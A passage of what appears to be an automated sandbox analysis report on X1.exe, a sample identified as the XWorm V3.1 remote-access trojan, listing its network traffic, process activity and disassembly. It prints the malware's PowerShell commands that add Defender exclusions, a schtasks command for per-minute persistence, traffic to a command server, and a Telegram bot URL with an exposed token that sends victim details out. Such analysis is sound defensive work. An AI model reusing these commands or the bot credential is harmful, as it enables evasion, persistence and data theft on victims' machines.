                                                                              Apr 24, 2024 02:55:40.029937983 CEST497144442192.168.2.591.92.252.220
                                                                              Apr 24, 2024 02:55:40.369287014 CEST44424971491.92.252.220192.168.2.5
                                                                              Apr 24, 2024 02:55:52.480977058 CEST497144442192.168.2.591.92.252.220
                                                                              Apr 24, 2024 02:55:52.820226908 CEST44424971491.92.252.220192.168.2.5
                                                                              Apr 24, 2024 02:56:03.472305059 CEST44424971491.92.252.220192.168.2.5
                                                                              Apr 24, 2024 02:56:03.527205944 CEST497144442192.168.2.591.92.252.220
                                                                              Apr 24, 2024 02:56:04.933768988 CEST497144442192.168.2.591.92.252.220
                                                                              Apr 24, 2024 02:56:05.272315025 CEST44424971491.92.252.220192.168.2.5
                                                                              Apr 24, 2024 02:56:17.387264013 CEST497144442192.168.2.591.92.252.220
                                                                              Apr 24, 2024 02:56:17.726279020 CEST44424971491.92.252.220192.168.2.5
                                                                              Apr 24, 2024 02:56:29.699573040 CEST497144442192.168.2.591.92.252.220
                                                                              Apr 24, 2024 02:56:30.051435947 CEST44424971491.92.252.220192.168.2.5
                                                                              Apr 24, 2024 02:56:31.058927059 CEST497144442192.168.2.591.92.252.220
                                                                              Apr 24, 2024 02:56:31.398250103 CEST44424971491.92.252.220192.168.2.5
                                                                              Apr 24, 2024 02:56:33.471440077 CEST44424971491.92.252.220192.168.2.5
                                                                              Apr 24, 2024 02:56:33.511535883 CEST497144442192.168.2.591.92.252.220
                                                                              Apr 24, 2024 02:56:35.230669975 CEST497144442192.168.2.591.92.252.220
                                                                              Apr 24, 2024 02:56:35.569305897 CEST44424971491.92.252.220192.168.2.5
                                                                              Apr 24, 2024 02:56:35.855720043 CEST497144442192.168.2.591.92.252.220
                                                                              Apr 24, 2024 02:56:36.194293022 CEST44424971491.92.252.220192.168.2.5
                                                                              Apr 24, 2024 02:56:36.194418907 CEST497144442192.168.2.591.92.252.220
                                                                              Apr 24, 2024 02:56:36.533370972 CEST44424971491.92.252.220192.168.2.5
                                                                              Apr 24, 2024 02:56:38.230964899 CEST497144442192.168.2.591.92.252.220
                                                                              Apr 24, 2024 02:56:38.570168018 CEST44424971491.92.252.220192.168.2.5
                                                                              Apr 24, 2024 02:56:40.996475935 CEST497144442192.168.2.591.92.252.220
                                                                              Apr 24, 2024 02:56:41.334292889 CEST44424971491.92.252.220192.168.2.5
                                                                              Apr 24, 2024 02:56:41.334358931 CEST497144442192.168.2.591.92.252.220
                                                                              Apr 24, 2024 02:56:41.673461914 CEST44424971491.92.252.220192.168.2.5

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Apr 24, 2024 02:54:41.103363037 CEST5316453192.168.2.51.1.1.1
                                                                              Apr 24, 2024 02:54:41.257587910 CEST53531641.1.1.1192.168.2.5
                                                                              Apr 24, 2024 02:55:22.173156977 CEST6513153192.168.2.51.1.1.1
                                                                              Apr 24, 2024 02:55:22.327167034 CEST53651311.1.1.1192.168.2.5

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Apr 24, 2024 02:54:41.103363037 CEST192.168.2.51.1.1.10x34cdStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                              Apr 24, 2024 02:55:22.173156977 CEST192.168.2.51.1.1.10x30c8Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Apr 24, 2024 02:54:41.257587910 CEST1.1.1.1192.168.2.50x34cdNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                              Apr 24, 2024 02:55:22.327167034 CEST1.1.1.1192.168.2.50x30c8No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • api.telegram.org
                                                                              • ip-api.com

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549704208.95.112.1803664C:\Users\user\Desktop\X1.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 24, 2024 02:54:41.468682051 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                              Host: ip-api.com
                                                                              Connection: Keep-Alive
                                                                              Apr 24, 2024 02:54:41.628637075 CEST175INHTTP/1.1 200 OK
                                                                              Date: Wed, 24 Apr 2024 00:54:40 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Content-Length: 6
                                                                              Access-Control-Allow-Origin: *
                                                                              X-Ttl: 60
                                                                              X-Rl: 44
                                                                              Data Raw: 66 61 6c 73 65 0a
                                                                              Data Ascii: false


                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549710149.154.167.2204433664C:\Users\user\Desktop\X1.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-04-24 00:55:23 UTC324OUTGET /bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V3.1%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB98DB222DCA51DFE7851%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1
                                                                              Host: api.telegram.org
                                                                              Connection: Keep-Alive
                                                                              2024-04-24 00:55:23 UTC388INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0
                                                                              Date: Wed, 24 Apr 2024 00:55:23 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 366
                                                                              Connection: close
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                              2024-04-24 00:55:23 UTC366INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 38 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 32 31 32 38 39 38 38 34 32 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 4f 54 4e 45 54 48 41 43 4b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 65 73 68 6f 6d 61 6e 64 6f 68 61 63 6b 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 39 36 36 36 34 39 36 37 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 2e 30 2e 30 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 70 65 67 61 6c 65 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 33 39 32 30 31 32 33 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57
                                                                              Data Ascii: {"ok":true,"result":{"message_id":2855,"from":{"id":2128988424,"is_bot":true,"first_name":"BOTNETHACK","username":"beshomandohack_bot"},"chat":{"id":966649672,"first_name":".0.0","username":"spegalex","type":"private"},"date":1713920123,"text":"\u2620 [XW


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:02:54:34
                                                                              Start date:24/04/2024
                                                                              Path:C:\Users\user\Desktop\X1.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\Desktop\X1.exe"
                                                                              Imagebase:0xc50000
                                                                              File size:48'128 bytes
                                                                              MD5 hash:2AB2F26AB78DBD53CEA3B71C00D568C2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3286328027.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3286328027.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:2
                                                                              Start time:02:54:40
                                                                              Start date:24/04/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe'
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:3
                                                                              Start time:02:54:40
                                                                              Start date:24/04/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:5
                                                                              Start time:02:54:46
                                                                              Start date:24/04/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X1.exe'
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:02:54:46
                                                                              Start date:24/04/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:8
                                                                              Start time:02:54:59
                                                                              Start date:24/04/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\X1.exe'
                                                                              Imagebase:0x7ff7be880000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:02:54:59
                                                                              Start date:24/04/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:10
                                                                              Start time:02:55:18
                                                                              Start date:24/04/2024
                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe"
                                                                              Imagebase:0x7ff725d70000
                                                                              File size:235'008 bytes
                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:11
                                                                              Start time:02:55:18
                                                                              Start date:24/04/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:13
                                                                              Start time:02:55:29
                                                                              Start date:24/04/2024
                                                                              Path:C:\Users\user\AppData\Roaming\X1.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\X1.exe"
                                                                              Imagebase:0xf90000
                                                                              File size:48'128 bytes
                                                                              MD5 hash:2AB2F26AB78DBD53CEA3B71C00D568C2
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\X1.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\X1.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\X1.exe, Author: Joe Security
                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\X1.exe, Author: ditekSHen
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 79%, ReversingLabs
                                                                              • Detection: 71%, Virustotal, Browse
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:14
                                                                              Start time:02:55:38
                                                                              Start date:24/04/2024
                                                                              Path:C:\Users\user\AppData\Roaming\X1.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\X1.exe"
                                                                              Imagebase:0xa10000
                                                                              File size:48'128 bytes
                                                                              MD5 hash:2AB2F26AB78DBD53CEA3B71C00D568C2
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:15
                                                                              Start time:02:56:01
                                                                              Start date:24/04/2024
                                                                              Path:C:\Users\user\AppData\Roaming\X1.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Users\user\AppData\Roaming\X1.exe
                                                                              Imagebase:0xf60000
                                                                              File size:48'128 bytes
                                                                              MD5 hash:2AB2F26AB78DBD53CEA3B71C00D568C2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:18%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:33.3%
                                                                                Total number of Nodes:9
                                                                                Total number of Limit Nodes:0

                                                                                Executed Functions

                                                                                Function 00007FF848F1A1BB Relevance: 4.3, Strings: 3, Instructions: 580COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 7ff848f1a1bb-7ff848f1a20a 5 7ff848f1a25a-7ff848f1a289 0->5 6 7ff848f1a20c-7ff848f1a253 0->6 8 7ff848f1a28b-7ff848f1a2a2 5->8 9 7ff848f1a302 5->9 6->5 10 7ff848f1a2a8-7ff848f1a2ae 8->10 11 7ff848f19c77-7ff848f19c84 8->11 14 7ff848f1a307-7ff848f1a342 9->14 10->9 15 7ff848f1a2b0-7ff848f1a2c7 10->15 12 7ff848f19588-7ff848f1960a 11->12 13 7ff848f19c8a-7ff848f19d80 11->13 43 7ff848f1960c-7ff848f1962d 12->43 44 7ff848f1962f-7ff848f19663 12->44 70 7ff848f1a3fc-7ff848f1a437 13->70 71 7ff848f19d86-7ff848f19de9 13->71 16 7ff848f1921a-7ff848f19227 15->16 17 7ff848f1a2cd-7ff848f1a2d4 15->17 16->12 20 7ff848f1922d-7ff848f1926b 16->20 23 7ff848f1a2de-7ff848f1a2e5 17->23 20->10 30 7ff848f19271-7ff848f1928e call 7ff848f18178 20->30 26 7ff848f1a2e7-7ff848f1a2f1 call 7ff848f10368 23->26 27 7ff848f1a2f6 23->27 26->27 27->9 30->10 36 7ff848f19294-7ff848f192ce 30->36 45 7ff848f1932d-7ff848f19355 36->45 46 7ff848f192d0-7ff848f19323 36->46 49 7ff848f1966a-7ff848f196ac 43->49 44->49 55 7ff848f19c49-7ff848f19c71 45->55 56 7ff848f1935b-7ff848f19368 45->56 46->45 72 7ff848f196ae-7ff848f196cf 49->72 73 7ff848f196d1-7ff848f19705 49->73 55->10 55->11 56->12 57 7ff848f1936e-7ff848f19460 56->57 135 7ff848f19c20-7ff848f19c26 57->135 136 7ff848f19466-7ff848f19538 call 7ff848f10358 57->136 82 7ff848f1a43c-7ff848f1a477 70->82 71->82 94 7ff848f19def-7ff848f19e52 71->94 76 7ff848f1970c-7ff848f19823 call 7ff848f10358 72->76 73->76 152 7ff848f19848-7ff848f1987c 76->152 153 7ff848f19825-7ff848f19846 76->153 90 7ff848f1a47c-7ff848f1a4b7 82->90 99 7ff848f1a4bc-7ff848f1a4f7 90->99 94->90 117 7ff848f19e58-7ff848f19fb6 call 7ff848f18188 94->117 108 7ff848f1a4fc-7ff848f1a537 99->108 118 7ff848f1a53c-7ff848f1a58c 108->118 117->99 188 7ff848f19fbc-7ff848f1a12a 117->188 143 7ff848f1a58e-7ff848f1a5af 118->143 144 7ff848f1a5b4-7ff848f1a5e8 118->144 135->9 139 7ff848f19c2c-7ff848f19c43 135->139 136->12 139->55 139->56 143->144 149 7ff848f1a5ef 144->149 149->149 158 7ff848f19883-7ff848f1991a 152->158 153->158 158->12 186 7ff848f19920-7ff848f19ad0 call 7ff848f10358 158->186 186->9 233 7ff848f19ad6-7ff848f19ad8 186->233 188->9 225 7ff848f1a130-7ff848f1a132 188->225 225->118 226 7ff848f1a138-7ff848f1a176 225->226 226->108 238 7ff848f1a17c-7ff848f1a1b9 226->238 234 7ff848f19ade-7ff848f19b1c 233->234 235 7ff848f1a347-7ff848f1a394 233->235 234->14 248 7ff848f19b22-7ff848f19bad 234->248 250 7ff848f1a3bc-7ff848f1a3f7 235->250 251 7ff848f1a396-7ff848f1a3b7 235->251 260 7ff848f19bfd-7ff848f19c1a 248->260 261 7ff848f19baf-7ff848f19bf6 248->261 250->70 251->250 260->135 261->260
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: >$B$SAO_^
                                                                                • API String ID: 0-1231990507
                                                                                • Opcode ID: cd0cee3222b377ebad80498972e528369f7b4532fe403c06ba99ba44c739db18
                                                                                • Instruction ID: e0634b1fbac84a017561f7132612dd2bb24a19669f4f183c5dd8b6f10431dbad
                                                                                • Opcode Fuzzy Hash: cd0cee3222b377ebad80498972e528369f7b4532fe403c06ba99ba44c739db18
                                                                                • Instruction Fuzzy Hash: 2512A170A28A099FE788EB2C8899779B7E2FF88744F54457DD00DD32D1DF38A8818B45
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F19129 Relevance: 4.2, Strings: 2, Instructions: 1708COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 263 7ff848f19129-7ff848f191bd call 7ff848f18d40 call 7ff848f10378 call 7ff848f17f18 274 7ff848f191bf-7ff848f191ec call 7ff848f10388 263->274 275 7ff848f191f1-7ff848f19214 263->275 274->275 279 7ff848f1921a-7ff848f19227 275->279 280 7ff848f1a2cd-7ff848f1a2d4 275->280 281 7ff848f19588-7ff848f1960a 279->281 282 7ff848f1922d-7ff848f1926b 279->282 283 7ff848f1a2de-7ff848f1a2e5 280->283 307 7ff848f1960c-7ff848f1962d 281->307 308 7ff848f1962f-7ff848f19663 281->308 289 7ff848f1a2a8-7ff848f1a2ae 282->289 290 7ff848f19271-7ff848f1928e call 7ff848f18178 282->290 286 7ff848f1a2e7-7ff848f1a2f1 call 7ff848f10368 283->286 287 7ff848f1a2f6 283->287 286->287 291 7ff848f1a302 287->291 289->291 293 7ff848f1a2b0-7ff848f1a2c7 289->293 290->289 298 7ff848f19294-7ff848f192ce 290->298 297 7ff848f1a307-7ff848f1a342 291->297 293->279 293->280 305 7ff848f1932d-7ff848f19355 298->305 306 7ff848f192d0-7ff848f19323 298->306 313 7ff848f19c49-7ff848f19c71 305->313 314 7ff848f1935b-7ff848f19368 305->314 306->305 312 7ff848f1966a-7ff848f196ac 307->312 308->312 331 7ff848f196ae-7ff848f196cf 312->331 332 7ff848f196d1-7ff848f19705 312->332 313->289 319 7ff848f19c77-7ff848f19c84 313->319 314->281 315 7ff848f1936e-7ff848f19460 314->315 381 7ff848f19c20-7ff848f19c26 315->381 382 7ff848f19466-7ff848f19538 call 7ff848f10358 315->382 319->281 323 7ff848f19c8a-7ff848f19d80 319->323 364 7ff848f1a3fc-7ff848f1a437 323->364 365 7ff848f19d86-7ff848f19de9 323->365 336 7ff848f1970c-7ff848f19823 call 7ff848f10358 331->336 332->336 402 7ff848f19848-7ff848f1987c 336->402 403 7ff848f19825-7ff848f19846 336->403 373 7ff848f1a43c-7ff848f1a477 364->373 365->373 387 7ff848f19def-7ff848f19e52 365->387 383 7ff848f1a47c-7ff848f1a4b7 373->383 381->291 385 7ff848f19c2c-7ff848f19c43 381->385 382->281 393 7ff848f1a4bc-7ff848f1a4f7 383->393 385->313 385->314 387->383 413 7ff848f19e58-7ff848f19fb6 call 7ff848f18188 387->413 405 7ff848f1a4fc-7ff848f1a537 393->405 408 7ff848f19883-7ff848f1991a 402->408 403->408 415 7ff848f1a53c-7ff848f1a58c 405->415 408->281 446 7ff848f19920-7ff848f19ad0 call 7ff848f10358 408->446 413->393 468 7ff848f19fbc-7ff848f1a12a 413->468 438 7ff848f1a58e-7ff848f1a5af 415->438 439 7ff848f1a5b4-7ff848f1a5e8 415->439 438->439 443 7ff848f1a5ef 439->443 443->443 446->291 492 7ff848f19ad6-7ff848f19ad8 446->492 468->291 514 7ff848f1a130-7ff848f1a132 468->514 493 7ff848f19ade-7ff848f19b1c 492->493 494 7ff848f1a347-7ff848f1a394 492->494 493->297 508 7ff848f19b22-7ff848f19bad 493->508 511 7ff848f1a3bc-7ff848f1a3f7 494->511 512 7ff848f1a396-7ff848f1a3b7 494->512 528 7ff848f19bfd-7ff848f19c1a 508->528 529 7ff848f19baf-7ff848f19bf6 508->529 511->364 512->511 514->415 516 7ff848f1a138-7ff848f1a176 514->516 516->405 527 7ff848f1a17c-7ff848f1a1b9 516->527 528->381 529->528
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6$SAO_^
                                                                                • API String ID: 0-3855498335
                                                                                • Opcode ID: 650dbc240be871c892101da1c9e8ca4a672c64252ad3a14d9ee2400b5be173a2
                                                                                • Instruction ID: 70e6ea61cdfcd2464477b1b1ed7a3f25aa683f45f4d53ab9b441f8f2022fe2e0
                                                                                • Opcode Fuzzy Hash: 650dbc240be871c892101da1c9e8ca4a672c64252ad3a14d9ee2400b5be173a2
                                                                                • Instruction Fuzzy Hash: 22C27F70A28A099FE788FF28C499779B7E2FF98744F544579D40DD3291DF38A8818B42
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FF848F1FECD Relevance: 2.3, Strings: 1, Instructions: 1045COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 584 7ff848f1fecd-7ff848f1fef5 586 7ff848f1ff3f-7ff848f1ff52 584->586 587 7ff848f1fef7-7ff848f1ff02 call 7ff848f10640 584->587 589 7ff848f1ff8f 586->589 590 7ff848f1ff54-7ff848f1ff71 586->590 591 7ff848f1ff07-7ff848f1ff3c 587->591 592 7ff848f1ff94-7ff848f1ffa9 589->592 590->592 595 7ff848f1ff73-7ff848f1ff8a call 7ff848f10870 call 7ff848f10650 590->595 591->586 600 7ff848f1ffab-7ff848f1ffdb call 7ff848f10870 592->600 601 7ff848f1ffe0-7ff848f1fff5 592->601 617 7ff848f209a7-7ff848f209b7 595->617 600->617 608 7ff848f20008-7ff848f2001d 601->608 609 7ff848f1fff7-7ff848f20003 call 7ff848f1dd88 601->609 618 7ff848f2001f-7ff848f20022 608->618 619 7ff848f20073-7ff848f20088 608->619 609->617 618->589 620 7ff848f20028-7ff848f20033 618->620 624 7ff848f200d9-7ff848f200ee 619->624 625 7ff848f2008a-7ff848f2008d 619->625 620->589 621 7ff848f20039-7ff848f2006e call 7ff848f10628 call 7ff848f1dd88 620->621 621->617 631 7ff848f2012b-7ff848f20140 624->631 632 7ff848f200f0-7ff848f200f3 624->632 625->589 627 7ff848f20093-7ff848f2009e 625->627 627->589 629 7ff848f200a4-7ff848f200d4 call 7ff848f10628 call 7ff848f1bd78 627->629 629->617 640 7ff848f201e4-7ff848f201f9 631->640 641 7ff848f20146-7ff848f2015e call 7ff848f105b0 631->641 632->589 635 7ff848f200f9-7ff848f20126 call 7ff848f10628 call 7ff848f1bd80 632->635 635->617 652 7ff848f20218-7ff848f2022d 640->652 653 7ff848f201fb-7ff848f201fe 640->653 641->589 661 7ff848f20164-7ff848f2019c call 7ff848f174d0 641->661 664 7ff848f2024f-7ff848f20264 652->664 665 7ff848f2022f-7ff848f20232 652->665 653->589 654 7ff848f20204-7ff848f20213 call 7ff848f1bd58 653->654 654->617 661->589 681 7ff848f201a2-7ff848f201df call 7ff848f1dd98 661->681 672 7ff848f20284-7ff848f20299 664->672 673 7ff848f20266-7ff848f2027f 664->673 665->589 666 7ff848f20238-7ff848f2024a call 7ff848f1bd58 665->666 666->617 679 7ff848f202b9-7ff848f202ce 672->679 680 7ff848f2029b-7ff848f202b4 672->680 673->617 686 7ff848f202ee-7ff848f20303 679->686 687 7ff848f202d0-7ff848f202e9 679->687 680->617 681->617 692 7ff848f20309-7ff848f20381 686->692 693 7ff848f203a3-7ff848f203b8 686->693 687->617 692->589 717 7ff848f20387-7ff848f2039e 692->717 697 7ff848f203ba-7ff848f203cb 693->697 698 7ff848f203d0-7ff848f203e5 693->698 697->617 704 7ff848f203eb-7ff848f20463 698->704 705 7ff848f20485-7ff848f2049a 698->705 704->589 734 7ff848f20469-7ff848f20480 704->734 710 7ff848f2049c-7ff848f204ad 705->710 711 7ff848f204b2-7ff848f204c7 705->711 710->617 719 7ff848f204c9-7ff848f20503 call 7ff848f10b10 call 7ff848f1f490 711->719 720 7ff848f20508-7ff848f2051d 711->720 717->617 719->617 727 7ff848f2051f-7ff848f2052c call 7ff848f1f490 720->727 728 7ff848f20531-7ff848f20546 720->728 727->617 735 7ff848f20548-7ff848f20582 call 7ff848f10b10 call 7ff848f1f490 728->735 736 7ff848f20587-7ff848f2059c 728->736 734->617 735->617 742 7ff848f20629-7ff848f2063e 736->742 743 7ff848f205a2-7ff848f205b3 736->743 752 